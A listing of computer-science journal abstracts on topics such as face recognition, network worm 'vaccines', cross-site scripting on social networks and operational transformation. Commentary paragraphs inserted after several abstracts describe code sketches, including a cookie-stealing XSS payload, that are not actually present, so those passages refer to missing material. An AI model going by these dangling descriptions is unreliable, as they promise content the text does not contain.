A Geometric Programming Approach for The Automotive Production in Turkey [ Full-Text ]
Ersoy ÖZ and İbrahim GÜNEY
Geometric Programming is an important class of nonlinear programming problems, characterized by objective and constraint functions of a special form: both the objective and the constraints may be nonlinear. Nonlinear optimization models can be solved by several methods; among them, Geometric Programming is an efficient method for a particular class of nonlinear problems and can therefore be advantageous where linear programming does not apply. In this work, the Cobb-Douglas production function is formulated as a Geometric Programming model. The 2009 production data of three automotive firms in Turkey are used in the model. The objective of the work is to estimate the number of employees and the capital input that minimize production costs, using the Geometric Programming solution method. For the estimations, the ggplab toolbox, which implements an interior-point algorithm and runs under Matlab, is used.
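The cost-minimization problem behind this abstract can be sketched as a small geometric program: minimize labor and capital cost wL + rK subject to a Cobb-Douglas output constraint A·L^a·K^b ≥ Q. The closed-form optimum below is standard textbook algebra, not the paper's ggplab/Matlab implementation, and all parameter values are illustrative rather than the 2009 firm data.

```python
def cobb_douglas_min_cost(A, a, b, w, r, Q):
    """Minimize cost w*L + r*K subject to A * L**a * K**b >= Q.

    At the optimum the constraint binds and marginal products are
    proportional to input prices, giving K/L = (b*w)/(a*r).
    """
    base = (Q / A) ** (1.0 / (a + b))
    L = base * ((a * r) / (b * w)) ** (b / (a + b))
    K = base * ((b * w) / (a * r)) ** (a / (a + b))
    return L, K, w * L + r * K

# Illustrative numbers only (not the paper's data):
L, K, cost = cobb_douglas_min_cost(A=2.0, a=0.6, b=0.4, w=30.0, r=50.0, Q=100.0)
```

A quick sanity check is that any other (L, K) pair meeting the output target costs at least as much as the returned solution.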
——————————————————————————————————————————————————————————————————–
Rotation Independent Face Recognition using Neuro-Genetic Hybrid Algorithm [ Full-Text ]
Md. Rabiul Islam and Md. Fayzur Rahman
This paper presents an approach to enhancing the performance of a face recognition system using a hybrid algorithm based on Artificial Neural Networks (ANN) optimized by a Genetic Algorithm (GA), providing robustness to rotational distortion. Although the traditional face recognition system is very sensitive to variations in face parameters, the proposed Neuro-Genetic hybrid system is found to be stable and performs well, improving the robustness and naturalness of human-computer interaction. In this work, we investigated two approaches to improving face recognition performance in a rotational face environment: one extracts features from the face image using improved and efficient image pre-processing techniques, with a fuzzy membership function used for the feature extraction. The other combines the extracted features in the Neuro-Genetic hybrid algorithm to improve the performance of the rotational face recognition system. Experimental results show the superiority of the proposed rotation-independent face recognition system across various orientations.
——————————————————————————————————————————————————————————————————–
Vaccine for Network Worms [ Full-Text ]
M.Goldoust Jildani, S.Jabbehdari and A.Rahmani
Network worms are among the most common and dangerous forms of malware on the Internet: because they spread without direct human interaction, their propagation speed is very high. This automatic spreading allows worms to infect most of the computers on a network in a very short time, so the worm's damaging effects are felt across the entire network almost immediately. The objective of this article is to introduce a vaccine that can be injected into a network, and thereby into all of its computers; by repairing the vulnerable holes in each machine, it makes the network safe and, by preventing worm propagation, protects it against this type of malware. To study the effect of injecting the worm vaccine, a network with several vulnerable nodes connected to the Internet was simulated; the results showed a large decrease in the number of infected nodes.
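The kind of simulation described can be sketched with a toy random-scanning worm model; the network size, propagation and patching rates below are made-up parameters, not those of the paper's simulator.

```python
import random

def simulate(n_nodes=1000, vulnerable=0.4, scans_per_step=3,
             patch_per_step=0, steps=50, seed=1):
    """Discrete-time random-scanning worm over a fully reachable network.

    Each infected node probes `scans_per_step` random addresses per step;
    a probe infects its target if the target is vulnerable and unpatched.
    The "vaccine" patches `patch_per_step` random unpatched nodes per step.
    Returns the final number of infected nodes.
    """
    rng = random.Random(seed)
    state = ['V' if rng.random() < vulnerable else 'S' for _ in range(n_nodes)]
    state[0] = 'I'  # patient zero
    for _ in range(steps):
        infected = [i for i, s in enumerate(state) if s == 'I']
        for _ in range(patch_per_step):          # vaccinate (patch) nodes
            candidates = [i for i, s in enumerate(state) if s in ('S', 'V')]
            if candidates:
                state[rng.choice(candidates)] = 'P'
        for i in infected:                       # worm scans
            for _ in range(scans_per_step):
                j = rng.randrange(n_nodes)
                if state[j] == 'V':
                    state[j] = 'I'
    return sum(1 for s in state if s == 'I')
```

Running the model with and without patching reproduces the qualitative claim: vaccinated networks end up with far fewer infected nodes.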
——————————————————————————————————————————————————————————————————–
3-Way Handshake Approach towards Secure Authentication Schemes [ Full-Text ]
Gaurav Kumar Tak, Ashok Rangnathan and Pankaj Srivastava
Computer crime can be defined as criminal activity that involves an information technology infrastructure, including illegal access (unauthorized access), illegal interception, data interference (unauthorized damaging, deletion, deterioration, alteration or suppression of computer data), unethical access to information and web services, disturbance of social peace, systems interference (interfering with the functioning of a computer system by inputting, transmitting, damaging, deleting, deteriorating, altering or suppressing computer data), misuse of devices, forgery (ID theft), and electronic fraud. This paper introduces a new methodology against intruders as well as phishing attackers. The proposed methodology is based on a 3-way handshake between the end user and the online portal server. It provides a secure environment for online transactions using three layers: the first layer performs username and password authentication, while the second and third layers perform cross-validation via e-mail and SMS respectively.
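A minimal sketch of the three layers described (password check, then e-mail and SMS cross-validation) might look as follows; the class name, the in-memory OTP "delivery" and the callback interface are illustrative, not the paper's implementation.

```python
import hashlib
import hmac
import os
import secrets

class ThreeLayerAuth:
    """Toy 3-step login: password -> e-mail OTP -> SMS OTP."""

    def __init__(self, password):
        self.salt = os.urandom(16)
        self.pw_hash = hashlib.pbkdf2_hmac('sha256', password.encode(),
                                           self.salt, 100_000)
        self.email_otp = None
        self.sms_otp = None

    def layer1_password(self, attempt):
        h = hashlib.pbkdf2_hmac('sha256', attempt.encode(), self.salt, 100_000)
        if not hmac.compare_digest(h, self.pw_hash):
            return False
        # On success, issue the two out-of-band codes (here just stored;
        # a real server would e-mail / SMS them to the account holder).
        self.email_otp = f"{secrets.randbelow(10**6):06d}"
        self.sms_otp = f"{secrets.randbelow(10**6):06d}"
        return True

    def layer2_email(self, code):
        return self.email_otp is not None and hmac.compare_digest(code, self.email_otp)

    def layer3_sms(self, code):
        return self.sms_otp is not None and hmac.compare_digest(code, self.sms_otp)

    def login(self, password, email_code_fn, sms_code_fn):
        """Run all three layers; the *_fn callbacks simulate the user
        reading the codes from their inbox / phone."""
        return (self.layer1_password(password)
                and self.layer2_email(email_code_fn())
                and self.layer3_sms(sms_code_fn()))
```

Because the second and third factors travel over separate channels, a phisher who captures only the password cannot complete the handshake.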
——————————————————————————————————————————————————————————————————–
Hybrid Face Recognition System using Multi Feature Neural Network [ Full-Text ]
K.V. Krishna Kishore and G.P.S.Varma
In this paper, a new face recognition method, the Hybrid Face Recognition System using a Multi-Feature Neural Network (MFNN), is proposed. The method consists of five phases: i) extracting images from the database, ii) normalization and face detection, iii) dimensionality reduction using wavelets, iv) feature extraction using PCA and LDA, and v) classification using the Multi-Feature Neural Network. The combination of PCA and LDA improves the capability of LDA when only a few sample images are available. The proposed system improves recognition rates over conventional LDA and PCA face recognition systems that use a Euclidean-distance-based classifier, and also outperforms PCA and LDA with neural classifiers. In the proposed system, two different feature domains are extracted from the training set in parallel, so the approach can capture both global and local characteristics of face images for classification. The proposed system was tested on the ORL, AR, and Indian databases of 40 people, each containing 10 images per person with different poses taken under varying illumination conditions. Experimental results show that the proposed system outperforms other existing methods in terms of low classification error and better time complexity.
——————————————————————————————————————————————————————————————————–
Algorithm and Implementation of the Blog-Post Supervision Process [ Full-Text ]
Kamanashis Biswas, Md. Liakat Ali and S.A.M. Harun
A web log, or blog for short, is a popular way to share personal entries with others through a website. A typical blog may contain text, images, audio and video. Most blogs serve as personal online diaries, while others focus on a specific interest such as photography (photoblog), art (artblog), travel (tourblog) or IT (techblog). Another type of blogging, called microblogging, is also very well known nowadays and consists of very short posts. As in developed countries, the number of blog users is gradually increasing in developing countries such as Bangladesh. Because access is open to all users, some people misuse blogs to spread fake news for individual or political gain. Some also post vulgar material that creates embarrassing situations for other bloggers and can even damage the reputation of the victim. One way to overcome this problem is to bring all posts under the supervision of the blog moderator, but that completely contradicts the spirit of blogging. In this paper, we implement an algorithm that helps prevent offensive entries from being posted: such entries must pass through a supervision process to qualify as legitimate posts. Our analysis shows that this approach can eliminate chaotic situations in the blogosphere to a great extent; in our experiments, about 90% of offensive posts were detected and stopped from being published.
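A simple keyword-based pre-moderation filter of the kind described might be sketched as below; the blacklist terms and the hit threshold are placeholders, since the paper's actual rules are not reproduced in the abstract.

```python
import re

BLACKLIST = {"scam", "fraudster", "obscene"}   # placeholder terms

def moderate(post, blacklist=BLACKLIST, threshold=1):
    """Return 'publish' or 'hold for supervision'.

    Tokenizes case-insensitively and counts blacklist hits; a post with
    `threshold` or more hits is routed to the moderator instead of
    being published directly.
    """
    words = re.findall(r"[a-z']+", post.lower())
    hits = sum(1 for w in words if w in blacklist)
    return "hold for supervision" if hits >= threshold else "publish"
```

Clean posts pass straight through, so only the suspicious minority ever reaches the moderator's queue.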
——————————————————————————————————————————————————————————————————–
An Indexing Technique for Web Ontologies [ Full-Text ]
Abad Shah, Amjad Farooq, Syed Ahsan and Mohammad Imran
On the semantic web, ontologies are usually stored as Resource Description Framework (RDF) documents. Different techniques, including advanced indexing techniques based on path indexes, keyword indexes, suffix arrays and the linked-data approach, are used to index RDF documents. However, existing RDF indexing techniques suffer from two major problems that result in poor performance: large index size and long lookup time. In this paper, we propose a technique for indexing RDF documents with a smaller index and faster lookup. We also present a lightweight implementation of the proposed indexing scheme using Java, Perl and MySQL as the database system. We use a synthetic dataset from the Lehigh University Benchmark containing 2.8 million triples to compare our system with implemented semantic systems such as Jena2, Sesame and Redland.
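An in-memory illustration of triple indexing: keeping three permutations of each (subject, predicate, object) triple lets any lookup pattern be answered with direct dictionary probes. This is a generic scheme shown for exposition, not the index layout proposed in the paper.

```python
from collections import defaultdict

class TripleIndex:
    """Index RDF-style triples under the SPO, POS and OSP orderings."""

    def __init__(self):
        self.spo = defaultdict(lambda: defaultdict(set))
        self.pos = defaultdict(lambda: defaultdict(set))
        self.osp = defaultdict(lambda: defaultdict(set))

    def add(self, s, p, o):
        self.spo[s][p].add(o)
        self.pos[p][o].add(s)
        self.osp[o][s].add(p)

    def query(self, s=None, p=None, o=None):
        """Return triples matching a pattern; None is a wildcard."""
        if s is not None and p is not None:
            return [(s, p, x) for x in self.spo[s][p] if o in (None, x)]
        if p is not None and o is not None:
            return [(x, p, o) for x in self.pos[p][o]]
        if o is not None and s is not None:
            return [(s, x, o) for x in self.osp[o][s]]
        if s is not None:
            return [(s, p2, o2) for p2, os_ in self.spo[s].items() for o2 in os_]
        if p is not None:
            return [(s2, p, o2) for o2, ss in self.pos[p].items() for s2 in ss]
        if o is not None:
            return [(s2, p2, o) for s2, ps in self.osp[o].items() for p2 in ps]
        return [(s2, p2, o2) for s2 in list(self.spo)
                for p2, os_ in self.spo[s2].items() for o2 in os_]
```

The example identifiers below echo the Lehigh University Benchmark vocabulary but are invented for illustration.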
——————————————————————————————————————————————————————————————————–
Improved compact State Machines for High Performance Pattern Matching [ Full-Text ]
Shanthi Makka
Pattern matching is the task of finding all occurrences of a pattern in a text. It is used in a wide range of applications, such as searching for particular patterns in DNA sequences, network intrusion detection and virus scanning; Internet search engines also use it to find web pages relevant to queries. Recently, parallel pattern matching engines based on ASICs, FPGAs or network processors have performed matching using multiple finite state machines. State migration during matching incurs intensive memory accesses, and it is difficult to shrink the state machines enough to fit them in on-chip or other fast memory modules for high-speed matching. To reduce the required storage, this paper proposes two optimization techniques, state re-labeling and memory partition, and presents architectural designs based on this optimization strategy. We evaluate our design using realistic pattern sets, and the results show state machine memory reductions of up to 90.1%.
——————————————————————————————————————————————————————————————————–
A New Dynamic Weight Assignment Schema for Index Terms Based on Statistical Approach [ Full-Text ]
Abad Shah, Syed Ahsan and Amjad Farooq
During the development of Information Retrieval (IR) systems, weights are assigned to an extracted set of index terms and then used for different purposes such as indexing, partial matching and computing rankings. The weight assignment schemes are usually provided by the IR models selected for the development of the IR system. Currently available weight assignment schemes are static, meaning that once weights are assigned to index terms, their values never change during the whole lifespan of the IR system. We have previously proposed a dynamic weight assignment scheme that can be used as part of any IR model; that scheme, however, was empirical and intuitive. In this paper, we propose another dynamic weight assignment scheme based on a statistical approach. In our opinion, the new scheme can give better performance than our previous one because it rests on a sounder foundation.
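The paper's statistical scheme is not spelled out in the abstract; purely to illustrate what "dynamic" means here, the sketch below starts from static tf-idf weights and nudges a term's weight up or down from user relevance feedback. The update rule and its `alpha` parameter are hypothetical, not the authors' scheme.

```python
import math

def tfidf(term_freq, doc_freq, n_docs):
    """Classic static tf-idf weight for one term in one document."""
    return term_freq * math.log(n_docs / doc_freq)

class DynamicWeights:
    """Hypothetical dynamic scheme: weights drift with feedback.

    Each relevant judgment on a document nudges the weights of its
    query terms upward; a non-relevant judgment nudges them downward.
    """

    def __init__(self, alpha=0.1):
        self.alpha = alpha
        self.w = {}          # (term, doc) -> current weight

    def init_weight(self, term, doc, tf, df, n_docs):
        self.w[(term, doc)] = tfidf(tf, df, n_docs)

    def feedback(self, term, doc, relevant):
        factor = 1 + self.alpha if relevant else 1 - self.alpha
        self.w[(term, doc)] *= factor
```

In a static scheme the `feedback` step simply never happens; everything else is the same.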
——————————————————————————————————————————————————————————————————–
Design & Implementation of Modified Mac Based Pipelining Technique for Wireless Networks [ Full-Text ]
V. Kumar and P. Balasubramanie
Wireless networks and communications have revolutionized human life. The demand for wireless networks is increasing, and they must meet many challenges; one such issue is the design of an efficient MAC protocol. In this paper, we study and develop a new MAC protocol based on pipelining techniques, and we observe that the proposed protocol performs well.
——————————————————————————————————————————————————————————————————–
Energy Consumption and Starvation Reduction in Multi-Robot Wireless Communication [ Full-Text ]
Priya Shanmugam
In a multi-robot system (MRS), energy consumption and starvation are major problems when using the IEEE 802.11 protocol. The starvation problem is governed by the contention window, i.e., the communication frame between source and destination. Previous work on the contention window of IEEE 802.11 MAC doubles the window size while waiting for the communication channel, e.g., 8, 16, 32, up to 1024. In the proposed work, the contention window is incremented and decremented using the natural logarithm to achieve more effective communication. Using trapezoidal fuzzy logic for energy consumption, robots use the least energy for the nearest node and more energy for the farthest node, based on the link quality, distance, noise and received signal strength between neighboring nodes, thus obtaining good routing.
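The abstract does not give the exact update rule, so the following is one plausible reading: grow and shrink the contention window by a step proportional to CW/ln(CW) instead of doubling, which backs off much more gently than binary exponential backoff.

```python
import math

CW_MIN, CW_MAX = 8, 1024

def cw_on_collision(cw):
    """Logarithmic increase: step = ceil(cw / ln(cw)) instead of doubling."""
    return min(CW_MAX, cw + math.ceil(cw / math.log(cw)))

def cw_on_success(cw):
    """Symmetric logarithmic decrease, floored at CW_MIN."""
    return max(CW_MIN, cw - math.ceil(cw / math.log(cw)))

# Compare growth with classic binary exponential backoff:
log_cw, bin_cw = CW_MIN, CW_MIN
trace = []
for _ in range(6):
    log_cw = cw_on_collision(log_cw)
    bin_cw = min(CW_MAX, bin_cw * 2)
    trace.append((log_cw, bin_cw))
```

After six consecutive collisions the doubling scheme has already saturated near 512, while the logarithmic scheme is still well below 100, which is the kind of gentler growth the abstract argues reduces starvation.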
——————————————————————————————————————————————————————————————————–
Cross-site scripting attack in Social Networking Environment [ Full-Text ]
Fahim Mohammed, Deepak Singh Tomar and J. L. Rana
At present, social networks are an effective means of sharing end-user information and views; with high network bandwidth and ample memory widely available, end users can share information effectively, yet security and privacy remain poorly addressed. In recent years many social network sites have suffered from cross-site scripting and phishing attacks, conducted by malicious users who insert vulnerable scripts into web form components. In this work, an attack scenario in a social network environment is implemented to demonstrate how an attacker exploits the vulnerabilities of poorly written application code to degrade server performance and mount phishing attacks on a social website. Challenges in handling cross-site scripting attacks in the web environment are also presented.
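The defensive side of the scenario can be illustrated in a few lines: output-encoding user input with `html.escape` neutralizes an injected script, and a naive pattern check can flag suspicious form submissions. This is a generic illustration, not the attack or defense code used in the study.

```python
import html
import re

SUSPICIOUS = re.compile(r"<\s*script|javascript:|on\w+\s*=", re.IGNORECASE)

def looks_like_xss(field_value):
    """Crude heuristic: does a web-form field carry script-like payload?"""
    return bool(SUSPICIOUS.search(field_value))

def render_comment(user_text):
    """Escape user text before embedding it in the page, so an injected
    <script> tag is displayed as text instead of being executed."""
    return "<div class='comment'>" + html.escape(user_text) + "</div>"

# A classic cookie-stealing payload (hostname is a placeholder):
payload = "<script>document.location='http://evil.example/?c='+document.cookie</script>"
```

Real applications should rely on context-aware encoding and vetted sanitization libraries rather than ad-hoc regexes; the heuristic above exists only to show where a filter sits in the flow.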
——————————————————————————————————————————————————————————————————–
Analytical Solution for Enzyme Catalyzed Reaction Based On Total Quasi Steady State Approximation [ Full-Text ]
Prashant Dwivedi and Madhvi Shakya
The Michaelis-Menten formalism based on the standard quasi-steady-state approximation (sQSSA), derived for a single-enzyme reaction, has described the kinetics of many enzyme-catalyzed reactions for a number of years. Based on this sQSSA, a closed-form solution for the basic enzyme reaction was derived earlier by Schnell and Mendoza. Their solution is expressed in terms of a relatively recent function, the Lambert W function, which satisfies the transcendental equation W(x)exp(W(x)) = x. However, this formalism is valid only when the enzyme concentration is sufficiently small. Recently, Borghans et al. introduced the total quasi-steady-state approximation (tQSSA), which is valid for a broader range of parameters. In the present work, an attempt is made to derive an analytical solution for substrate decomposition and product formation with the aid of the Lambert W function for a single enzyme-substrate reaction, based on the total quasi-steady-state approximation.
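The earlier Schnell-Mendoza closed form mentioned in the abstract can be evaluated directly: under the sQSSA, substrate decays as S(t) = K_M · W((S0/K_M) · exp((S0 − V_max·t)/K_M)), with W computed here by a small Newton iteration. The parameter values are illustrative, and the paper's tQSSA extension is not reproduced.

```python
import math

def lambert_w(x, tol=1e-12):
    """Principal branch of W for x >= 0, via Newton's method on
    f(w) = w*exp(w) - x."""
    w = math.log1p(x)            # decent starting guess for x >= 0
    for _ in range(100):
        ew = math.exp(w)
        step = (w * ew - x) / (ew * (1 + w))
        w -= step
        if abs(step) < tol:
            break
    return w

def substrate(t, s0, km, vmax):
    """Schnell-Mendoza sQSSA closed form for substrate concentration."""
    arg = (s0 / km) * math.exp((s0 - vmax * t) / km)
    return km * lambert_w(arg)

def product(t, s0, km, vmax):
    """Product formed is the substrate consumed (mass balance)."""
    return s0 - substrate(t, s0, km, vmax)
```

The solution recovers S(0) = S0 exactly and decays monotonically, matching the defining property w·e^w = x of the Lambert W function.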
——————————————————————————————————————————————————————————————————–
New Optimized Generic Operational Transformation Consistency Control Algorithms Supporting String Operations in Collaborative Applications [ Full-Text ]
Santosh Kumawat and Ajay Khunteta
Real-time cooperative editing systems allow multiple users to view and edit the same document at the same time from multiple sites connected by a network. Consistency maintenance is one of the most challenging tasks in the design and implementation of such systems. Operational Transformation (OT) is an established optimistic consistency control method in collaborative applications. Most OT algorithms consider only the two character-based primitive operations, insert and delete; our algorithm supports two string-based primitive operations. This paper presents new optimized generic OT control algorithms, SITOSq and MswapDsqD, that reduce the runtime overhead of recursion in the ITOSq and swapDsqD algorithms respectively. Likewise, SITOL and MswapLO reduce recursion compared with ITOL and swapLO.
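For background, the classic character-level inclusion transformation that string-based OT algorithms generalize can be written in a few lines; the convergence check below shows two concurrent operations, each transformed against the other, producing the same final document at both sites. This is the textbook character-based scheme, not the SITOSq/MswapDsqD algorithms themselves.

```python
def apply_op(doc, op):
    """op is ('ins', pos, char), ('del', pos) or ('nop',)."""
    if op[0] == 'ins':
        return doc[:op[1]] + op[2] + doc[op[1]:]
    if op[0] == 'del':
        return doc[:op[1]] + doc[op[1] + 1:]
    return doc

def transform(op, against, tie_right=False):
    """Inclusion transform: rewrite `op` so it applies after `against`."""
    if op[0] == 'nop' or against[0] == 'nop':
        return op
    p, q = op[1], against[1]
    if against[0] == 'ins':
        # Positions at or right of the insertion shift right by one;
        # tie_right breaks insert-insert ties by site priority.
        if p < q or (op[0] == 'ins' and p == q and not tie_right):
            return op
        return (op[0], p + 1) + op[2:]
    # against is ('del', q): positions right of the deletion shift left.
    if p < q or (op[0] == 'ins' and p == q):
        return op
    if op[0] == 'del' and p == q:
        return ('nop',)          # both sites deleted the same character
    return (op[0], p - 1) + op[2:]
```

The string-based operations the paper studies behave like runs of these character operations, with the transformation applied to whole spans at once.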
——————————————————————————————————————————————————————————————————–
A Comparative study of MANET and VANET Environment [ Full-Text ]
Arzoo Dahiya and R. K. Chauhan
On-demand setup, fault tolerance and unconstrained connectivity are among the advantages that allow mobile computing to continue its rapid growth. Over the last three decades, tremendous progress has been made in wireless ad-hoc network research, and nowadays one of the most attractive research topics is inter-vehicle communication, i.e., the realization of a vehicular ad-hoc network. VANETs have recently been attracting increasing attention from both industry and the research community. A rich literature on MANETs exists, but the availability of traffic data and vehicle equipment motivates researchers to explore the special characteristics of VANETs. In this paper we survey and compare the MANET and VANET environments from the literature, and finally share a collection of useful references.
——————————————————————————————————————————————————————————————————–
Impact of Aspect Oriented Programming on Software Development Design Quality Metrics-A Comparative Study [ Full-Text ]
Kotrappa Sirbi and Prakash Jayanth Kulkarni
The aspect-oriented programming approach is intended to enhance a system's qualities, such as modularity, readability and simplicity. With a better modularization of crosscutting concerns, the resulting implementation is less complex and more readable; software development efficiency therefore increases, and the system can be created faster than its object-oriented equivalent. The study reveals that the aspect-oriented programming approach appears to be a full-fledged alternative to the pure object-oriented approach. In this comparative study, we present existing and new software metrics useful in the design phase of Object-Oriented Software Development (OOSD) that also extend through the SDLC of Aspect-Oriented Software Development (AOSD). We compare definitions of the proposed AOSD design quality metrics and identify those that are useful for improving software design quality using AOSD.
——————————————————————————————————————————————————————————————————–
Regression Testing Techniques [ Full-Text ]
Rashmi Pandey
The most technical and demanding phase in the software development life cycle is the maintenance phase, in which the development team must maintain the software delivered to clients on time. Software maintenance is driven by needs such as error correction, enhancement of capabilities, modification of outdated modules and optimization. The changed or modified software then requires testing, known as regression testing. In this paper we present the various types of regression testing techniques and the classifications proposed by various researchers, explaining selective and prioritizing test-case approaches for regression testing in detail.
——————————————————————————————————————————————————————————————————–
Script Identification from Multilingual Indian Documents using Structural Features [ Full-Text ]
Rajesh Gopakumar, N.V.SubbaReddy, Krishnamoorthi Makkithaya and U.Dinesh Acharya
Script identification from a given document image is an important process for many computer applications, such as automatic archiving of multilingual documents, searching online archives of document images, and selecting a script-specific OCR in a multilingual environment. In this paper, a zone-based structural feature extraction algorithm for the recognition of South Indian scripts along with English and Hindi is proposed. The document images are segmented into lines, each line image is divided into different zones, and structural features are extracted. A total of 37 features were extracted in the first level and then reduced to an optimal number of features using wrapper and filter selection approaches. The K-nearest-neighbor and support vector machine classifiers are used for classification and recognition. Very good classification accuracy is achieved on the optimal feature set.
——————————————————————————————————————————————————————————————————–
Intelligent Maturity Cure Prediction Model (IMCPM) for Polymer Matrix Composite Curing [ Full-Text ]
Doreswamy Hosahalli
In this paper, a novel Intelligent Maturity Cure Prediction Model (IMCPM) is designed to predict the mature cure rate and temperature required for ideal curing of composite materials. Predefined knowledge discovery models and numerical simulation models are integrated into the IMCPM for predicting and analyzing the cure status that is inherently associated with the polymer matrix, the reinforcement fiber and the pultrusion process conditions. Polymer resin matrix and reinforcement fiber properties satisfying the composite component are revealed by the data mining / knowledge discovery models. Experimentally determined process conditions are defined in the knowledge base of the proposed system to improve decision-making performance. The maturity cure status of the composite materials is analyzed with a kinetic model and the heat-governing partial differential equation. IMCPM is a knowledge-based prediction model that incorporates heat transfer and resin kinetic models coupled with a materials database, a knowledge base of prerequisite processing strategies, and knowledge discovery models for predicting the polymer resin and reinforcement fiber satisfying the composite component. It predicts the optimal cure rate and temperature imperative for the ideal curing of epoxy-resin-impregnated composites, preventing part overheating while maintaining the maximum cure heat-up rate. This results in a significant reduction in total cure time over standard methods. The system uses a cure process model to determine optimal cure profiles for tool/part configurations of varying thermal characteristics; these profiles indicate the heating and cooling necessary to ensure a complete cure of the part in the pultrusion process in the minimum amount of time. The model is shown to be a particularly convenient way of examining the qualitative aspects of various process scenarios before running the pultruder.
——————————————————————————————————————————————————————————————————–
Knowledge Discovery System For Fiber Reinforced Polymer Matrix Composite Laminate [ Full-Text ]
Doreswamy Hosahalli
In this paper, a Knowledge Discovery System (KDS) is proposed for extracting knowledge, namely the mean stiffness of a polymer composite material in which the fibers are placed at different orientations. The cosine amplitude method is implemented for retrieving a compatible polymer matrix and reinforcement fiber from the polymer and reinforcement databases respectively, based on the design specifications. Fuzzy classification rules that classify fibers into short, medium and long classes are derived from the fiber length and the computed critical fiber length. The longitudinal and transverse moduli of a polymer matrix composite consisting of seven layers with different fiber volume fractions and fiber orientations of 0, 15, 30, 45, 60, 75 and 90 degrees are analyzed through the "rule of mixtures" material design model. The analysis results are presented in several graphical steps and evaluated with statistical parameters. The data mining application implemented here focuses on the mechanical problems of material design and analysis; the system is therefore proposed as an expert decision support system for optimizing material performance when designing lightweight, strong and cost-effective polymer composite materials.
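The "rule of mixtures" used for the longitudinal and transverse moduli is standard micromechanics and can be sketched directly; the fiber and matrix values below are typical E-glass/epoxy figures chosen for illustration, not the paper's database entries.

```python
def longitudinal_modulus(e_fiber, e_matrix, v_fiber):
    """Voigt (iso-strain) rule of mixtures: E_L = Vf*Ef + (1-Vf)*Em."""
    return v_fiber * e_fiber + (1 - v_fiber) * e_matrix

def transverse_modulus(e_fiber, e_matrix, v_fiber):
    """Reuss (iso-stress) rule of mixtures:
    E_T = Ef*Em / (Vf*Em + (1-Vf)*Ef)."""
    return e_fiber * e_matrix / (v_fiber * e_matrix + (1 - v_fiber) * e_fiber)

# Typical E-glass / epoxy moduli in GPa (illustrative only):
EF, EM = 70.0, 3.5
laminate = [longitudinal_modulus(EF, EM, vf) for vf in (0.3, 0.4, 0.5, 0.6)]
```

The transverse modulus is always the lower of the two bounds, which is why fiber orientation matters so much in the laminate analysis the paper describes.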
——————————————————————————————————————————————————————————————————–
Customer Perception on Internet Banking and their Impact on Customer Satisfaction & Loyalty: A Study in Indian Context [ Full-Text ]
Neha Dixit and Saroj K. Datta
Internet banking has become increasingly important because it is one of the most popular delivery channels for banking services accepted by customers in the cyber era. This study investigates how customers perceive the value of Internet banking compared with traditional banking. It identifies the perceived service quality dimensions of this self-service technology and the impact of these dimensions on customer satisfaction with Internet banking. Primary data were collected from 250 respondents through a structured questionnaire. Statistical analysis, descriptive statistics and correlation were used to measure the perceived service quality of Internet banking (IB) and the level of satisfaction among customers in India. The findings show that factors such as perceived value, perceived service quality, customer satisfaction and loyalty have a significant impact on customer acceptance of Internet banking.
——————————————————————————————————————————————————————————————————–
Keys of Software Testing [ Full-Text ]
Ashok Shrivastava and Naveen Gupta
Software testing is a process aimed at evaluating the capability of a program or system and determining that it accomplishes its required task. Although crucial to software quality and widely deployed by programmers and testers, software testing still remains an art, owing to our limited understanding of the principles of software. The difficulty of software testing stems from the complexity of software: we cannot completely test a program of any significant complexity. Testing is much more than debugging. The purpose of testing can be quality assurance, verification and validation, or reliability estimation; testing can also be used as a generic metric. Correctness testing and reliability testing are two major areas of testing. Software testing is a trade-off among budget, time and quality.
——————————————————————————————————————————————————————————————————–
Model Driven Framework for Networked Application Software Generation [ Full-Text ]
K. Ramesh and T. Ramesh
This paper presents a domain-specific, component-based framework to model networked systems and to automate the generation of networked application software. The framework employs a two-level model: one level specifies the system-level architecture and the other the process level. The former contains unified models for networked elements called Networked Nodes (NN). With the Networked Node instrumented as a Generic Modeling Environment (GME) metamodel, NetProc, a networked system becomes a composition of NetProcs, sub-systems, shared objects and their interconnections. At the process level, the framework supports modeling of connection management, event detection, de-multiplexing, event dispatching, and composition of dynamically configured services specific to networked elements. The exported XML model is parsed and an appropriate intermediate structure is constructed; by applying suitable code generation techniques and reusing components, software generation is automated. The proposed framework supports customization of a networked system and is found to increase software productivity.
——————————————————————————————————————————————————————————————————–
Markov Process to forecast the demand of the motor policies in Insurance Industry in the market [ Full-Text ]
Neha Jain and R. K. Shrivastava
Finance, budgeting and investment are areas of management decision making to which the tools and techniques of Operations Research are applied. In modern times of economic crisis, careful planning for the economic development of a country has become essential for every government. Operations Research techniques can be fruitfully applied in an insurance corporation to decide what the premium rates for various modes of policies should be and how best the profits could be distributed in the case of with-profit policies. A Markov process is applicable in situations where the state of the system can be described by some numerical measure and where the system moves from one state to another on a probabilistic basis. This problem is an example of the brand-switching problem that often arises in the sale of consumer goods.
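The brand-switching computation behind this abstract can be sketched as a two-insurer retention/switching matrix iterated to its steady state, which serves as the long-run demand forecast; the transition probabilities are invented for illustration.

```python
def steady_state(P, iters=200):
    """Long-run market shares of a regular Markov chain, obtained by
    repeatedly multiplying an initial distribution by the transition
    matrix P (power iteration)."""
    n = len(P)
    pi = [1.0 / n] * n
    for _ in range(iters):
        pi = [sum(pi[i] * P[i][j] for i in range(n)) for j in range(n)]
    return pi

# Rows: current insurer; columns: insurer chosen at renewal.
# E.g. 80% of insurer A's motor-policy holders renew with A, 20% switch.
P = [[0.8, 0.2],
     [0.3, 0.7]]
shares = steady_state(P)   # long-run demand per insurer
```

Because the chain is regular, the shares converge regardless of the starting distribution, so the forecast does not depend on today's exact market split.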
——————————————————————————————————————————————————————————————————–
Distance Parameter Based Facial Expression Recognition Using Neural Networks [ Full-Text ]
Anitha C, M K Venkatesha and B Suryanarayana Adiga
In any facial expression recognition system, locating and extracting features is the first task to be accomplished, and extraction based on feature points is one of the most widely used techniques. The proposed work is capable of recognizing facial expressions with only eight parameters derived from a set of ten feature points. The system identifies the basic emotions: happiness, sadness, surprise, disgust, anger and fear. Distance parameters, derived from the feature points extracted from the images, are used for expression recognition; their use makes the system invariant to pose and illumination to a certain extent. The parameter set is trained and tested using a feed-forward neural network.
——————————————————————————————————————————————————————————————————–
Application of Unsupervised Learning in Clinical Oncology Practice – Exploring Anxiety Characteristics in Chemotherapy-Induced Nausea and Vomiting through Principal Variables [ Full-Text ]
Kevin Yi-Lwern Yap, Xin Ran Yak, Vivianne Shih, Wai Keung Chui and Alexandre Chan
